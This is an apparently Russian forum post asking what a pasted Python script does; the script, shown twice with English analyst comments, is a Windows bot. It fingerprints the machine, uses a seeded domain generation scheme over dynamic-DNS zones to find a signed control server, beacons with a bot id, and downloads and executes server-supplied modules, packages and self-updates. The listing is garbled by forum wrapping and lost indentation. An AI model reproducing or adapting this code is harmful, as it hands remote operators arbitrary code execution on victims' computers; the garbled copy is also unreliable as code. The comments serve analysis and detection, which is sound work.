traceme
16.09.2015, 21:35
Подскажите, пожалуйста, что делает этот код?
import ctypes
from ctypes import wintypes
import subprocess
from base64 import b64encode,b64decode
import threading
import traceback
import hashlib
import zipfile
import urllib2
import inspect
import urllib
import socket
import shutil
import ctypes
import random
import _winreg as winreg
import types
import json
import time
import rsa
import sys
import re
import os
# ctypes prototypes for kernel32 CreateMutexA and GetLastError. The
# singleinstance class uses them to create a named mutex and read the
# resulting error code. GetLastError's restype is declared here as HANDLE.
_CreateMutex=ctypes.windll.kernel32.CreateMutexA
_CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
_CreateMutex.restype=wintypes.HANDLE
_GetLastError=ctypes.windll.kernel32.GetLastError
_GetLastError.argtypes=[]
_GetLastError.restype=wintypes.HANDLE
# Single-instance guard built on a named Windows mutex.
# The hard-coded mutex name is identical on every host that runs this listing,
# which makes it a stable host-side indicator for detection.
class singleinstance:
# Creates (or opens) the named mutex and captures GetLastError right after the call.
def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False, self.mutexname);self.lasterror=_GetLastError()
# 183 is ERROR_ALREADY_EXISTS: the mutex was already present when it was requested.
def aleradyrunning(self):return self.lasterror==183
# Closes the mutex handle when the object is destroyed.
def __del__(self):
if self.mutex:_CloseHandle(self.mutex)
# Instantiates the mutex guard, waits one second, and terminates the process
# when the mutex already existed (another copy is presumably running).
def chk_mutex():
mutex=singleinstance();time.sleep(1)
if mutex.aleradyrunning():sys.exit()
# Thin wrapper that assembles a urllib2 opener (urllib2 implies Python 2).
# NOTE(review): the spaces inside identifiers such as "HTTPB asicAuthHandler"
# look like forum line-wrapping artifacts rather than original code; the block
# indentation was also lost on this page.
class Http:
# proxy: value used for the 'http' entry of a ProxyHandler (falsy = no proxy handler).
# cookie_support: adds an HTTPCookieProcessor when truthy.
# ua: User-Agent override; when falsy a fixed Firefox 3.0.1 / Windows NT 5.1
# string is used, which is a constant network-side indicator.
def __init__(self,proxy=False,cookie_support=False,ua= False):
self.handlers=set()
if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPB asicAuthHandler()])
if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
if self.handlers:self.interface=urllib2.build_opener( *self.handlers)
else:self.interface=urllib2.build_opener(urllib2.B aseHandler)
# The opener is installed process-wide, not only kept on this object.
urllib2.install_opener(self.interface)
if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
self.interface.addheaders=[('User-agent',ua)]
# Builds a urllib2.Request for url and adds a Referer header when one is given.
# The post parameter is accepted but not used in this body.
def prepare_request(self,url,post=False,referer=False) :
request=urllib2.Request(url)
if referer:request.add_header('Referer',referer)
return request
# Convenience layer over Http that remembers a timeout (default 60 seconds).
class Web:
def __init__(self,proxy=False,cookie_support=False,ua= False,timeout=60):self.timeout=timeout;self.web=Ht tp(proxy,cookie_support,ua)
# Opens url and returns the response object. With data, the mapping is
# url-encoded and sent as the request body; without data no body is sent.
# referer is passed positionally, so it lands in prepare_request's second
# parameter (post), which that method does not use.
def fetch(self,url,data=False,referer=False):
request=self.web.prepare_request(url,referer)
if data:data=urllib.urlencode(data);response=self.web .interface.open(request,data,timeout=self.timeout)
else:response=self.web.interface.open(request,time out=self.timeout)
return response
# Local stand-in exposing post()/get() and a .text attribute, implemented on
# top of the Web class defined in this file. It is a class declared in this
# listing, not an imported package.
class requests:
# Minimal response holder: only carries the body as .text.
class texter:
def __init__(self,text):self.text=text
# Sends the request through Web, using proxies['http'] as the proxy and
# headers['User-Agent'] as the User-Agent, and returns the body wrapped in texter.
@staticmethod
def post(url,data=False,proxies=False,headers=False):
if not proxies:proxies={'http':False}
if not headers:headers={'User-Agent':False}
resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
# Same as post() with no data argument.
@staticmethod
def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
# Writes data to fname in binary mode, replacing any existing content.
def file_put_contents(fname,data):
with open(fname,'wb') as f:f.write(data)
# Returns the full content of fname read in binary mode.
def file_get_contents(fname):
with open(fname,'rb') as f:return f.read()
# Returns the shortest text found between tag1 and tag2 in text, or '' when
# there is no match. The tags are placed into the regular expression as-is
# (not escaped); re.S lets the match span line breaks.
def extract_text(text,tag1,tag2):
match=re.search('{}(.*?){}'.format(tag1,tag2),text ,re.M|re.S)
if match is None:return ''
return match.group(1)
# Derives a per-machine identifier. First choice is the MachineGuid value read
# from the Cryptography key under HKEY_LOCAL_MACHINE; if that fails, the last
# whitespace-separated token printed by the "vol c:" command is used instead.
# Either value is lower-cased. main() sends it to the server as the bot id, so
# registry reads of MachineGuid by a script interpreter are worth correlating.
def get_hard_id():
try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SO FTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
# Changes the process working directory to name.
def set_cur_dir(name):os.chdir(name)
# Returns the directory that contains this script file (symlinks resolved).
def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
# Builds a 9-character label from lowercase letters and digits. It draws from
# the module-level random generator, so the output follows whatever seed was
# last set with random.seed().
def get_pseudo():
alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseud o=''
for i in range(9):pseudo=pseudo+random.choice(alpha)
return pseudo
# Verifies an RSA signature carried inside text and returns the result of
# rsa.verify, or False when anything in the process raises.
# The long literal is a base64-encoded public key that is decoded and loaded
# with rsa.PublicKey.load_pkcs1; the signature is taken as hex and the signed
# data as base64, both cut out of text with extract_text.
# NOTE(review): the tag arguments to extract_text appear empty or blank here;
# presumably the forum stripped markup-like delimiters, so the real tag names
# cannot be recovered from this page. The spaces inside the key literal and
# identifiers also look like forum wrapping artifacts.
def chk_sign(text):
result=False
try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFW S0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW9 3NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCU VlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVl vUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb 1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1h KdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6b lJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1d YOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEU k05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1J RdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tL S0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b 64decode(public_data);pubkey=rsa.PublicKey.load_pk cs1(public_data.encode());sign=extract_text(text,' ','');sign=sign.decode('hex');data=extract_text(te xt,'','');data=b64decode(data);result=rsa.verify(d ata,sign,pubkey)
except Exception as e:result=False
return result
# Blocks until a TCP connection to google.com port 80 succeeds (30 s timeout
# per attempt), printing the error and retrying every 2 seconds on failure.
def wait_for_internet():
is_internet=False
while not is_internet:
try:sock=socket.create_connection(('google.com',80 ),timeout=30);is_internet=True;sock.close()
except Exception as e:print(e);time.sleep(2)
# Creates an empty module object called name and executes code inside its
# namespace with exec, then returns the module. Whatever code is passed in runs
# with the privileges of this process; run_new_module() is the caller here.
def import_code(code,name):module=types.ModuleType(nam e);exec(code,module.__dict__);return module
# Locates the control server by generating candidate host names and accepting
# the first response whose signature verifies in chk_sign (a domain generation
# scheme). Returns (decoded config, ip, host, path).
# The random generator is seeded with a fixed constant, so the sequence of
# labels from get_pseudo() is reproducible for a given interpreter; defenders
# can use that to enumerate candidates for blocking or sinkholing.
# The suffix list mixes top-level domains with free-hosting and dynamic-DNS zones.
# NOTE(review): indentation was lost on this page, so the nesting of the
# counter, reseed and sleep lines below cannot be read from the listing.
def get_serv_data():
random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.ne t','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk' ,'.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su' ,'.do.am','.narod.ru','.3utilities.com','.bounceme .net','.ddns.net','.ddnsking.com','.gotdns.ch','.h opto.org','.myftp.biz','.myftp.org','.myvnc.com',' .no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.c om','.serveblog.net','.servecounterstrike.com','.s erveftp.com','.servegame.com','.servehalflife.com' ,'.servehttp.com','.serveminecraft.net','.servemp3 .com','.servepics.com','.servequake.com','.sytes.n et','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;itera tor=0
while loop:
sub_domain=get_pseudo()
for e in domains:
# Candidate host is <label><suffix>; the probed URL is http://<host>/<label>.txt.
# The host name is also handed to do_request as its second argument, which
# that function uses as the HTTP proxy address.
domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain )
if chk_sign(text):rsa_config=text;loop=False;break
iterator+=1
# Reseeding with the same constant restarts the same label sequence.
if iterator>=100:iterator=0;random.seed(538479483)
time.sleep(2)
# NOTE(review): the tag arguments appear as empty strings; presumably the
# forum stripped markup-like delimiters, so the field names are not recoverable.
rsa_config=extract_text(text,'','');rsa_config=b64 decode(rsa_config);print(rsa_config);main_config=e xtract_text(rsa_config,'','');ip=extract_text(main _config,'','');host=extract_text(main_config,'','' );path=extract_text(main_config,'','');return rsa_config,ip,host,path
# Fetches url and returns the response body as text, or '' on any exception.
# ip is supplied as the 'http' proxy, so the request is directed at that
# address while url still names the host and path. With data the mapping is
# sent as form fields; without it a plain fetch is made.
def do_request(url,ip,data=False):
try:
proxy={'http':ip}
if data:return requests.post(url,proxies=proxy,data=data).text
return requests.get(url,proxies=proxy).text
except Exception:return ''
# Registry of module objects created by run_new_module, keyed by module name.
alive_modules={}
# Executes code as a new module via import_code, records it in alive_modules,
# and starts a thread that calls the module's payload(module, rsa_config).
# Returns the started thread.
def run_new_module(rsa_config,code,name):imported=impo rt_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported. payload,args=(alive_modules[name],rsa_config));thread.start();return thread
# Calls exit() on the running module registered under module['name'] and then
# waits for the thread stored in module['thread'] to finish.
def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
# Makes sure the package named imp['name'] is importable. If the import fails,
# a zip archive is downloaded from imp['url'], written next to the script,
# extracted into the current directory, and its setup.py is run with the
# current interpreter.
# Both the name and the URL come from the caller's data (server-supplied in
# main), so this step writes and executes remotely provided files.
# NOTE(review): -X:FullFrames looks like an IronPython interpreter option,
# which would suggest the sample is meant to run under IronPython; unconfirmed.
def setup_import(imp):
try:print(imp['name']);__import__(imp['name']);return
except Exception as e:print(str(e))
try:
zip_s=requests.get(imp['url']).text
with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
# Any previous directory of the same name is removed before extraction.
try:shutil.rmtree(imp['name'])
except Exception as e:print(e)
with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
except Exception as e:return False
return True
# Main loop of the program: a polling client that downloads and runs code
# supplied by a remote server.
# Start-up: sleeps 10 s, enforces single instance through the mutex, changes to
# the script directory, derives the machine id, and resolves the server
# address through get_serv_data().
# Each cycle: posts the hashes of the loaded modules to
# http://<host><path>?h=<fixed string>&k=<machine id>&do=get_modules, then acts
# on the reply (sleep interval, module list, module code, optional self-update).
# Errors collected during a cycle are posted back with do=traceback.
# NOTE(review): indentation was lost and the extract_text tag arguments appear
# empty on this page (presumably stripped by the forum), so the exact nesting
# and the reply's field names cannot be read from the listing.
def main():
time.sleep(10);chk_mutex();rsa_config='';set_cur_d ir(get_script_dir());bot_id=get_hard_id();print('j mscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip, adminka_host,adminka_path=get_serv_data();loaded_m odules={}
while True:
post_data={}
for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbc srkvureutlepd',bot_id);print(post_data);resp=do_re quest(req_url,adminka_ip,data={'modules':json.dump s(post_data)});sleep=extract_text(resp,'','')
# Polling interval defaults to 7200 seconds when the reply does not carry one.
if not sleep:sleep='7200'
exception_text=''
try:
modules_head=extract_text(resp,'','')
if modules_head:modules_head=json.loads(modules_head)
else:modules_head=[]
modules_codes=extract_text(resp,'','');update_code =extract_text(resp,'','')
# Self-update: the script file is overwritten with the decoded payload and
# relaunched; creationflags=8 is DETACHED_PROCESS, then this process exits.
if update_code:print('Updating..');cur_script=os.path .realpath(__file__);code=b64decode(update_code);fi le_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
for module in modules_head:
print(module['name'])
# A module that is already loaded is stopped before being replaced.
if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
print('update imports');imports_result=True
for imp in module['imports']:
if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
if not imports_result:continue
print('load module');module_code=extract_text(modules_codes,'' ,'');module_code=b64decode(module_code);module_thr ead=0
# Only load_mode 'thread' starts the module; otherwise the thread slot stays 0.
if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,m odule_code,module['name'])
loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
except Exception as e:exception_text=exception_text+traceback.format_e xc()
# Error report: the collected text plus the raw reply are posted to the server.
if len(exception_text)!=0:
try:exception_text+='\n\n['+resp+']'
except Exception as e:pass
req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsr kvureutlepd',bot_id);do_request(req_url,adminka_ip ,data={'trace':exception_text})
try:time.sleep(int(sleep))
except Exception as e:time.sleep(7200)
# Runs main() only when the file is executed as a script.
if __name__=='__main__':main()
import ctypes
from ctypes import wintypes
import subprocess
from base64 import b64encode,b64decode
import threading
import traceback
import hashlib
import zipfile
import urllib2
import inspect
import urllib
import socket
import shutil
import ctypes
import random
import _winreg as winreg
import types
import json
import time
import rsa
import sys
import re
import os
# ctypes prototypes for kernel32 CreateMutexA and GetLastError. The
# singleinstance class uses them to create a named mutex and read the
# resulting error code. GetLastError's restype is declared here as HANDLE.
_CreateMutex=ctypes.windll.kernel32.CreateMutexA
_CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
_CreateMutex.restype=wintypes.HANDLE
_GetLastError=ctypes.windll.kernel32.GetLastError
_GetLastError.argtypes=[]
_GetLastError.restype=wintypes.HANDLE
# Single-instance guard built on a named Windows mutex.
# The hard-coded mutex name is identical on every host that runs this listing,
# which makes it a stable host-side indicator for detection.
class singleinstance:
# Creates (or opens) the named mutex and captures GetLastError right after the call.
def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False, self.mutexname);self.lasterror=_GetLastError()
# 183 is ERROR_ALREADY_EXISTS: the mutex was already present when it was requested.
def aleradyrunning(self):return self.lasterror==183
# Closes the mutex handle when the object is destroyed.
def __del__(self):
if self.mutex:_CloseHandle(self.mutex)
# Instantiates the mutex guard, waits one second, and terminates the process
# when the mutex already existed (another copy is presumably running).
def chk_mutex():
mutex=singleinstance();time.sleep(1)
if mutex.aleradyrunning():sys.exit()
# Thin wrapper that assembles a urllib2 opener (urllib2 implies Python 2).
# NOTE(review): the spaces inside identifiers such as "HTTPB asicAuthHandler"
# look like forum line-wrapping artifacts rather than original code; the block
# indentation was also lost on this page.
class Http:
# proxy: value used for the 'http' entry of a ProxyHandler (falsy = no proxy handler).
# cookie_support: adds an HTTPCookieProcessor when truthy.
# ua: User-Agent override; when falsy a fixed Firefox 3.0.1 / Windows NT 5.1
# string is used, which is a constant network-side indicator.
def __init__(self,proxy=False,cookie_support=False,ua= False):
self.handlers=set()
if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPB asicAuthHandler()])
if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
if self.handlers:self.interface=urllib2.build_opener( *self.handlers)
else:self.interface=urllib2.build_opener(urllib2.B aseHandler)
# The opener is installed process-wide, not only kept on this object.
urllib2.install_opener(self.interface)
if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
self.interface.addheaders=[('User-agent',ua)]
# Builds a urllib2.Request for url and adds a Referer header when one is given.
# The post parameter is accepted but not used in this body.
def prepare_request(self,url,post=False,referer=False) :
request=urllib2.Request(url)
if referer:request.add_header('Referer',referer)
return request
# Convenience layer over Http that remembers a timeout (default 60 seconds).
class Web:
def __init__(self,proxy=False,cookie_support=False,ua= False,timeout=60):self.timeout=timeout;self.web=Ht tp(proxy,cookie_support,ua)
# Opens url and returns the response object. With data, the mapping is
# url-encoded and sent as the request body; without data no body is sent.
# referer is passed positionally, so it lands in prepare_request's second
# parameter (post), which that method does not use.
def fetch(self,url,data=False,referer=False):
request=self.web.prepare_request(url,referer)
if data:data=urllib.urlencode(data);response=self.web .interface.open(request,data,timeout=self.timeout)
else:response=self.web.interface.open(request,time out=self.timeout)
return response
# Local stand-in exposing post()/get() and a .text attribute, implemented on
# top of the Web class defined in this file. It is a class declared in this
# listing, not an imported package.
class requests:
# Minimal response holder: only carries the body as .text.
class texter:
def __init__(self,text):self.text=text
# Sends the request through Web, using proxies['http'] as the proxy and
# headers['User-Agent'] as the User-Agent, and returns the body wrapped in texter.
@staticmethod
def post(url,data=False,proxies=False,headers=False):
if not proxies:proxies={'http':False}
if not headers:headers={'User-Agent':False}
resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
# Same as post() with no data argument.
@staticmethod
def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
# Writes data to fname in binary mode, replacing any existing content.
def file_put_contents(fname,data):
with open(fname,'wb') as f:f.write(data)
# Returns the full content of fname read in binary mode.
def file_get_contents(fname):
with open(fname,'rb') as f:return f.read()
# Returns the shortest text found between tag1 and tag2 in text, or '' when
# there is no match. The tags are placed into the regular expression as-is
# (not escaped); re.S lets the match span line breaks.
def extract_text(text,tag1,tag2):
match=re.search('{}(.*?){}'.format(tag1,tag2),text ,re.M|re.S)
if match is None:return ''
return match.group(1)
# Derives a per-machine identifier. First choice is the MachineGuid value read
# from the Cryptography key under HKEY_LOCAL_MACHINE; if that fails, the last
# whitespace-separated token printed by the "vol c:" command is used instead.
# Either value is lower-cased. main() sends it to the server as the bot id, so
# registry reads of MachineGuid by a script interpreter are worth correlating.
def get_hard_id():
try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SO FTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
# Changes the process working directory to name.
def set_cur_dir(name):os.chdir(name)
# Returns the directory that contains this script file (symlinks resolved).
def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
# Builds a 9-character label from lowercase letters and digits. It draws from
# the module-level random generator, so the output follows whatever seed was
# last set with random.seed().
def get_pseudo():
alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseud o=''
for i in range(9):pseudo=pseudo+random.choice(alpha)
return pseudo
# Verifies an RSA signature carried inside text and returns the result of
# rsa.verify, or False when anything in the process raises.
# The long literal is a base64-encoded public key that is decoded and loaded
# with rsa.PublicKey.load_pkcs1; the signature is taken as hex and the signed
# data as base64, both cut out of text with extract_text.
# NOTE(review): the tag arguments to extract_text appear empty or blank here;
# presumably the forum stripped markup-like delimiters, so the real tag names
# cannot be recovered from this page. The spaces inside the key literal and
# identifiers also look like forum wrapping artifacts.
def chk_sign(text):
result=False
try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFW S0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW9 3NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCU VlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVl vUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb 1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1h KdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6b lJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1d YOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEU k05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1J RdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tL S0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b 64decode(public_data);pubkey=rsa.PublicKey.load_pk cs1(public_data.encode());sign=extract_text(text,' ','');sign=sign.decode('hex');data=extract_text(te xt,'','');data=b64decode(data);result=rsa.verify(d ata,sign,pubkey)
except Exception as e:result=False
return result
# Blocks until a TCP connection to google.com port 80 succeeds (30 s timeout
# per attempt), printing the error and retrying every 2 seconds on failure.
def wait_for_internet():
is_internet=False
while not is_internet:
try:sock=socket.create_connection(('google.com',80 ),timeout=30);is_internet=True;sock.close()
except Exception as e:print(e);time.sleep(2)
# Creates an empty module object called name and executes code inside its
# namespace with exec, then returns the module. Whatever code is passed in runs
# with the privileges of this process; run_new_module() is the caller here.
def import_code(code,name):module=types.ModuleType(nam e);exec(code,module.__dict__);return module
# Locates the control server by generating candidate host names and accepting
# the first response whose signature verifies in chk_sign (a domain generation
# scheme). Returns (decoded config, ip, host, path).
# The random generator is seeded with a fixed constant, so the sequence of
# labels from get_pseudo() is reproducible for a given interpreter; defenders
# can use that to enumerate candidates for blocking or sinkholing.
# The suffix list mixes top-level domains with free-hosting and dynamic-DNS zones.
# NOTE(review): indentation was lost on this page, so the nesting of the
# counter, reseed and sleep lines below cannot be read from the listing.
def get_serv_data():
random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.ne t','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk' ,'.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su' ,'.do.am','.narod.ru','.3utilities.com','.bounceme .net','.ddns.net','.ddnsking.com','.gotdns.ch','.h opto.org','.myftp.biz','.myftp.org','.myvnc.com',' .no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.c om','.serveblog.net','.servecounterstrike.com','.s erveftp.com','.servegame.com','.servehalflife.com' ,'.servehttp.com','.serveminecraft.net','.servemp3 .com','.servepics.com','.servequake.com','.sytes.n et','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;itera tor=0
while loop:
sub_domain=get_pseudo()
for e in domains:
# Candidate host is <label><suffix>; the probed URL is http://<host>/<label>.txt.
# The host name is also handed to do_request as its second argument, which
# that function uses as the HTTP proxy address.
domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain )
if chk_sign(text):rsa_config=text;loop=False;break
iterator+=1
# Reseeding with the same constant restarts the same label sequence.
if iterator>=100:iterator=0;random.seed(538479483)
time.sleep(2)
# NOTE(review): the tag arguments appear as empty strings; presumably the
# forum stripped markup-like delimiters, so the field names are not recoverable.
rsa_config=extract_text(text,'','');rsa_config=b64 decode(rsa_config);print(rsa_config);main_config=e xtract_text(rsa_config,'','');ip=extract_text(main _config,'','');host=extract_text(main_config,'','' );path=extract_text(main_config,'','');return rsa_config,ip,host,path
# Fetches url and returns the response body as text, or '' on any exception.
# ip is supplied as the 'http' proxy, so the request is directed at that
# address while url still names the host and path. With data the mapping is
# sent as form fields; without it a plain fetch is made.
def do_request(url,ip,data=False):
try:
proxy={'http':ip}
if data:return requests.post(url,proxies=proxy,data=data).text
return requests.get(url,proxies=proxy).text
except Exception:return ''
# Registry of module objects created by run_new_module, keyed by module name.
alive_modules={}
# Executes code as a new module via import_code, records it in alive_modules,
# and starts a thread that calls the module's payload(module, rsa_config).
# Returns the started thread.
def run_new_module(rsa_config,code,name):imported=impo rt_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported. payload,args=(alive_modules[name],rsa_config));thread.start();return thread
# Calls exit() on the running module registered under module['name'] and then
# waits for the thread stored in module['thread'] to finish.
def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
# Makes sure the package named imp['name'] is importable. If the import fails,
# a zip archive is downloaded from imp['url'], written next to the script,
# extracted into the current directory, and its setup.py is run with the
# current interpreter.
# Both the name and the URL come from the caller's data (server-supplied in
# main), so this step writes and executes remotely provided files.
# NOTE(review): -X:FullFrames looks like an IronPython interpreter option,
# which would suggest the sample is meant to run under IronPython; unconfirmed.
def setup_import(imp):
try:print(imp['name']);__import__(imp['name']);return
except Exception as e:print(str(e))
try:
zip_s=requests.get(imp['url']).text
with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
# Any previous directory of the same name is removed before extraction.
try:shutil.rmtree(imp['name'])
except Exception as e:print(e)
with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
except Exception as e:return False
return True
# Main loop of the program: a polling client that downloads and runs code
# supplied by a remote server.
# Start-up: sleeps 10 s, enforces single instance through the mutex, changes to
# the script directory, derives the machine id, and resolves the server
# address through get_serv_data().
# Each cycle: posts the hashes of the loaded modules to
# http://<host><path>?h=<fixed string>&k=<machine id>&do=get_modules, then acts
# on the reply (sleep interval, module list, module code, optional self-update).
# Errors collected during a cycle are posted back with do=traceback.
# NOTE(review): indentation was lost and the extract_text tag arguments appear
# empty on this page (presumably stripped by the forum), so the exact nesting
# and the reply's field names cannot be read from the listing.
def main():
time.sleep(10);chk_mutex();rsa_config='';set_cur_d ir(get_script_dir());bot_id=get_hard_id();print('j mscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip, adminka_host,adminka_path=get_serv_data();loaded_m odules={}
while True:
post_data={}
for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbc srkvureutlepd',bot_id);print(post_data);resp=do_re quest(req_url,adminka_ip,data={'modules':json.dump s(post_data)});sleep=extract_text(resp,'','')
# Polling interval defaults to 7200 seconds when the reply does not carry one.
if not sleep:sleep='7200'
exception_text=''
try:
modules_head=extract_text(resp,'','')
if modules_head:modules_head=json.loads(modules_head)
else:modules_head=[]
modules_codes=extract_text(resp,'','');update_code =extract_text(resp,'','')
# Self-update: the script file is overwritten with the decoded payload and
# relaunched; creationflags=8 is DETACHED_PROCESS, then this process exits.
if update_code:print('Updating..');cur_script=os.path .realpath(__file__);code=b64decode(update_code);fi le_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
for module in modules_head:
print(module['name'])
# A module that is already loaded is stopped before being replaced.
if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
print('update imports');imports_result=True
for imp in module['imports']:
if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
if not imports_result:continue
print('load module');module_code=extract_text(modules_codes,'' ,'');module_code=b64decode(module_code);module_thr ead=0
# Only load_mode 'thread' starts the module; otherwise the thread slot stays 0.
if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,m odule_code,module['name'])
loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
except Exception as e:exception_text=exception_text+traceback.format_e xc()
# Error report: the collected text plus the raw reply are posted to the server.
if len(exception_text)!=0:
try:exception_text+='\n\n['+resp+']'
except Exception as e:pass
req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsr kvureutlepd',bot_id);do_request(req_url,adminka_ip ,data={'trace':exception_text})
try:time.sleep(int(sleep))
except Exception as e:time.sleep(7200)
# Runs main() only when the file is executed as a script.
if __name__=='__main__':main()